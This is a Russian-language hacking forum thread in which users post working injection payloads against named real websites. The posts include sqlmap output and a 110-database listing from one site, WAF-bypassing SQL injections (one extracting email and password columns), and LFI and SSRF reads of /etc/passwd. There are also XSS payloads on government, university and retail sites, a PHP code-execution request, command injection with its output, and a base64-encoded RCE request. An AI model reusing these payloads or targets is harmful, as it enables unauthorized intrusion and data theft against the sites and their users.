Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW

Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (comment)

Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#

Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV

Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

.SpoilerTarget" type="button">Spoiler: bd
available databases [110]:

1poverennaya.ru

3dschool.akadem-art.ru

acmoda_fashion

akadem-art.ru

amsterdam.ru

amur-tiger

api.olit.su

apteki.ru

at

ayashiclimat

berendeevo

bitrix_55

cargoflies.ru

civlife

cookies

cpa

cpa-monsters.ru

crypto

cv79250_db

db1050525_rpfm

dev.check-car.io

dish.ru

docdoc

dojoy.ru

dreamwood

el-torg.ru

fefectu_fikcii

game4art.ru

gidrolica

greencontinent.bio

hockeyfamily

hostel

information_schema

informed

irasmarovoz

kordik-psyhelp

kz_health

lecture

led1080.ru

lesspas

light

lotmo

mailer

maxphoto

medelement.ru

messenger

metalnastil.ru

miel.ru

modelery

mototelega

mysql

nanokeratin-shop

new.olit.su

new_olit

newoleg

olit_su

olmatveeva.ru

pdns

performance_schema

photoluxor

picture

pineapple

powerdns

prazdnik

pressnastil.ru

profdoctors.ru

push

radio.ru

recraft.ru-yii

redmine

rekomendacii

remcraft.ru

remcraft.ru-new

remcraft.ru-new1!!

resthistory

rlogistika

seobirds

seorakerus

seowant.ru

sflegaladvice

siluet.su

sitemanager0

skld

social

sound_olit

sound_olit_su

sport

spz-rus.ru

stroynastil.ru

stroynastil.ru1

sveng

telegramm

test

umgear.ru

union.ru

union.ru-old

vault-pdm.ru

velespro.com

videoportal

visagestyle

water-check.ru

wawtalk.io

webmonsters

whoknow.ru

yandex_bot

yiilab

ymga.ru

ymga.ru-new

zabbix

zaem-info.ru

Franky_T
06.11.2018, 23:48
Здравствуйте)

На форуме первый день, попробую тоже.

1. SQL-инъекция с обходом WAF


GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414, 1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
Host: www.cdlmacapa.com.br
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

2. SQL-инъекция с выводом в ошибке


http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x 3a,(select+user()+limit+0,1)))

Franky_T
10.11.2018, 20:34
Еще немножко - теперь LFI.


http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774

https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&email=marketing@fcostabrava.com```

http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd

http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd

qwaszx000
07.01.2019, 15:46
https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20

rusty@localhost
5.5.62
bible_history

Егорыч+++
07.01.2019, 16:39
↑ (https://antichat.live/posts/4275483/)

https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20

rusty@localhost
5.5.62
bible_history



Все было бы хорошо, но оно гуглится и похоже этой баге года два уже.

Numb
06.02.2019, 00:42
XSS

https://www.pinpics.com/searchT.php?keyw=alert('test')

Numb
16.02.2019, 00:36
XSS

1) https://elkomp.ru/search?sought=alert('xss')

2) https://kubnews.ru/poisk/?q=alert('xss') (https://kubnews.ru/poisk/?q=%3Cscript%3Ealert(%27xss%27)%3C/script%3E)

3) http://ivgoradm.ru/find=alert('xss')

4) https://www.lapsi.ru/list.php?q=alert('xss')

5) http://brykury.com.ua/products/search?search=alert('xss')

BenderMR
03.03.2019, 12:38
SQLi:

SoftwareOnRent


http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5, 6,concat_ws(0x7c,database(),%20user(),version()),8 ,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27--+&catid=1&compid=135


SOR|SORuser@localhost|5.5.56-MariaDB


http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5, 6,group_concat(column_name),8,9,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27%20from%20informat ion_schema.columns%20where%20table_schema=database ()%20and%20table_name=%27users%27--+&catid=1&compid=135

[B]SecurityDealOnline


http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%2 0concat_ws(0x7c,database(),version()))))--+

bluewings|bluewings1@localhost|5.6.39-cll-lve


http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%2 0count(table_name)%20from%20information_schema.tab les%20where%20table_schema=database()%20)))--+

BrandTagz


http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20d atabase(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts




http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat _ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts

BenderMR
08.03.2019, 11:58
Rcadia


http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19

rcadia2@rogueriver.dreamhost.com (mailto:rcadia2@rogueriver.dreamhost.com)|rcadia2| 5.6.34-log

Городской совет, Черкассы


http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+

myrada|myrada@ns1|5.5.24-log

Индусо шоп


https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+


myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1


https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,1 6,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#

RWD
16.03.2019, 16:20
way.com


https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12



http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))

crlf
28.07.2019, 20:58
https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net

lifescore
04.09.2019, 14:21
rce (=

.SpoilerTarget" type="button">Spoiler: oops
шттп://www. (http://www.t)t| u | torialspoint.com/

http://tlgur.com/d/g2bZA9ag

Stat on similarweb =)

http://tlgur.com/d/g5k0xpL8

PoC

.SpoilerTarget" type="button">Spoiler: query with params


from base64
UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3 RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpD b250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdX JsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNv bQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbX BpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x

Pop-Xlop
08.11.2019, 15:12
ZoneAlarm


https://forums.zonealarm.com/ajax/render/widget_php
POST:
widgetConfig[code]=phpinfo();

Octavian
15.02.2020, 20:28
Blind XSS в админке Hostinger, простите за ру сайт

https://crm.hostinger.io/client/29640132

PS: Зарепортил сказали спасибо и продлили хостинг на один месяц

https://i.ibb.co/3dDdY3n/xsshunter-screenshot-4d85d71612ad33e7805775752555a58641d7b54b611913e560 bd95db4d692e82c5fdcf8c13f04c1fa115f3c46d91956de781 1f05e83ba7831767d94d37dee38a8473804264852d54be80b2 991e38b7c136f36876cc61458ecb943bcb0dd3399dae0bc5e4 .jpg

Octavian
25.03.2020, 19:50
Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю )

У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог (

https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}.

+ XSS

https://secretdiscounter.com/ru/"//>alert(5) (https://secretdiscounter.com/ru/%22//%3E%3Cscript%3Ealert(5)%3C/script%3E)

sepo
27.03.2020, 18:31
General Inspectorate for Emergency Situations

Генеральная инспекция для чрезвычайных ситуаций


https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript% 3Ealert(666)%3C/script%3E

sepo
27.03.2020, 18:44
Promotora Española de Lingüística (Proel)


http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscri pt%3E&pagina=searchresult

sepo
29.03.2020, 15:43
Post-Reformation Digital Library (PRDL) - database that organizes the vast array of publicly available digital sources on the development of theology and philosophy during the early modern era (late 15th-18th c.). The PRDL spans collections from major research libraries, independent scholarly initiatives, and corporate documentation projects.



https://www.prdl.org/pub_name.php?p_name=%3Cscript%3Eprompt(%22xss%22)% 3C/script%3E

sepo
30.03.2020, 12:12
https://www.metaltorg.ru/metal_catalog/tsvetnyye_metally_splavy_prokat/dragotsennyye_metally/zoloto/?module=index%27%22()%26%25%3CScRiPt%20%3Eprompt(9 72295)%3C/ScRiPt%3E

sepo
15.04.2020, 01:31
University of Oxford

Faculty of Oriental Studies

XSS -


http://etcsl.orinst.ox.ac.uk/cgi-bin/etcsl.cgi?charenc=j&display=Crit&text=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2 Fscript%3E%3Cfont%3E

sepo
15.04.2020, 10:38
И снова учебное заведение в Великобритании

Macmillan Academy

XSS -


http://www.macmillan-academy.org.uk/search.php

В поле поиска вставляем - '"alert(1);

WallHack
06.05.2020, 11:28
SSRF


surfmaxxx.ru/system/web.php?u=file:///etc/passwd

sepo
09.05.2020, 01:25
XSS in

The European Genome-phenome Archive (EGA)


https://ega-archive.org/search-results.php?query=alert('1')

Lestatkiy
09.05.2020, 02:06
LFI


https://www.bridgeworld.com/indexphp.php?page=../../../../../etc/passwd

3nvY
26.06.2020, 21:00
ERROR Based SQL injection


https://client-api.coronavirus-monitor.com/v1/city-comments?per-page=20&q[id_city][or]=1=1)%20union%20SELECT%20cast(concat(version())%20 as%20bigint)%20FROM%20information_schema.tables%20--+-

sepo
11.07.2020, 01:17
PENNSYLVANIA ASSOCIATION OF PRIVATE SCHOOL ADMINISTRATORS


https://papsa.org/search/results.php?s=%3Cscript%3Ealert(%271%27)%3C/script%3E

sepo
20.07.2020, 22:46
EPOMM is the European Platform on Mobility Management, a network of governments in European countries that are engaged in Mobility Management (MM)

XSS:


http://www.epomm.eu/index.php?country_id=21&id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3 E

Lestatkiy
21.07.2020, 00:58
code executed


https://joemonster.org/search.php?q=dir%26dir

поле поиска под фильтрацией, но есть частичное исполнения комманд


dir&dir

ответ


Volume in drive H is Storage
Volume Serial Number is 20D8-07C3
Directory of H:\Gry

sepo
16.09.2020, 21:19
https://euacademics.com/country.php?id=">alert(1);

Octavian
15.03.2021, 15:11
Stored XSS на banggood

https://www.banggood.com/qa-question-1714302-1.html

sepo
20.03.2021, 17:56
The virtual community for English-speaking expats and Russians


https://www.expat.ru/culturereviews.php?cid=-211+union+select+1,2,3,version (),5,6,7,8,9,10,11--

Octavian
26.09.2021, 21:11
Получил такой отстук из сервисов Yandex

http://i.ibb.co/N21vkvs/photo-2021-09-26-20-04-43.jpg http://i.ibb.co/dQZvZ7y/photo-2021-09-26-20-04-36.jpg

erwerr2321
26.09.2021, 21:44
↑ (https://antichat.live/posts/4475715/)
Получил такой отстук из сервисов Yandex


ничёси, какая удача!

давно ли это случилось? и что сказали на ББ?

Octavian
26.09.2021, 22:00
↑ (https://antichat.live/posts/4475718/)
ничёси, какая удача!
давно ли это случилось? и что сказали на ББ?


Давно, без ответа по этому запостил.

Я в чате боту ответи XSS-кой

crlf
30.09.2021, 19:40
https://www.sportmaster.ru/catalog/product/search.do?text=lol%27-prompt(%27hek?%27)-%27&f-delivery=courier

crlf
30.09.2021, 19:40
https://thumbs.dfs.ivi.ru/storage9/contents/a/b/78a4a0ed16e16c38c75a92ffa15840.jpg?mod=

crlf
01.10.2021, 14:58
https://www.acer.com/ac/en/US/content/support-product/7603?b=1&pn=%3Cscript%3Ealert(/heck/);%3C/script%3E
https://job.detmir.ru/vacancies/?new-city=%3Csvg/onload=alert(document.domain)%3E

crlf
12.10.2021, 17:27
https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//

erwerr2321
21.10.2021, 22:26
↑ (https://antichat.live/posts/4475715/)
Получил такой отстук из сервисов Yandex
http://i.ibb.co/N21vkvs/photo-2021-09-26-20-04-43.jpg
http://i.ibb.co/dQZvZ7y/photo-2021-09-26-20-04-36.jpg


Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:

на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))

Но было ещё и третье место, откуда он постреливал.

И вот только вчера прилетело письмецо в конверте.

Octavian
24.10.2021, 21:41
↑ (https://antichat.live/posts/4478921/)
Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
Но было ещё и третье место, откуда он постреливал.
И вот только вчера прилетело письмецо в конверте.
View attachment 14009 (https://antichat.live/attachments/14009.img)


А моя доля? На шаверму

erwerr2321
24.10.2021, 21:47
↑ (https://antichat.live/posts/4479295/)
А моя доля? На шаверму


Шта?

Я её намного раньше тебя запостил! я ж писал тебе tracking ID и time 1619951822533

Ни гани!

eminlayer7788
01.11.2021, 16:35
SQLi

.SpoilerTarget" type="button">Spoiler: link
https://www.goal.az/livescore/tourn...oin (select 6)f join (select 7)g /news/45011/ (https://www.goal.az/livescore/tournament/42%20and%200%20union%20select%20*%20from%20(select %20group_concat(user())%20from%20users)a%20join%20 (select%202)b%20join%20(select%203)c%20join%20(sel ect%204)d%20join%20(select%205)e%20join%20(select% 206)f%20join%20(select%207)g%20/news/45011/)

eminlayer7788
18.11.2021, 16:02
sql injection

.SpoilerTarget" type="button">Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1%27group%20by%20mid(user()%20from%20floor(r and(0)*2))having%20avg(0)--%20-

and how to get table & column names ?

thanks for help !

ZeV$
25.11.2021, 06:47
↑ (https://antichat.live/posts/4481871/)
sql injection
Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1
%27group%20by%20mid(user()%20from%20floor(rand(0)* 2))having%20avg(0)--%20-
and how to get table & column names ?
thanks for help !


digging blind sqli

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9

...

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9

Octavian
19.02.2022, 15:57
Пришел мне лог на xsshunter с непонятного сайта, такой вот сайт который парсит но не обрабатывает вывод )

https://www.social-searcher.com/social-buzz/?q5=alert(document.cookie)

eminlayer7788
23.06.2022, 12:31
.SpoilerTarget" type="button">Spoiler: sqli
https://rezume.am/?filter_id[0]=5 a...ting_admins limit 1 offset 0*/))),false))--+- (https://rezume.am/?filter_id[0]=5%20and%20updatexml%28null,%28/*!50000concat*/%280x3a,0x7c,%28/*!40101%20seleCT*/%20/*!40101%20group_Concat%28database(),0x3a,%28versio n()%29%29*/%20from%20/**saaaaa**//*!40101%20joblisting_admins%20limit%201%20offset%2 00*/%29%29%29,false%29%29--+-)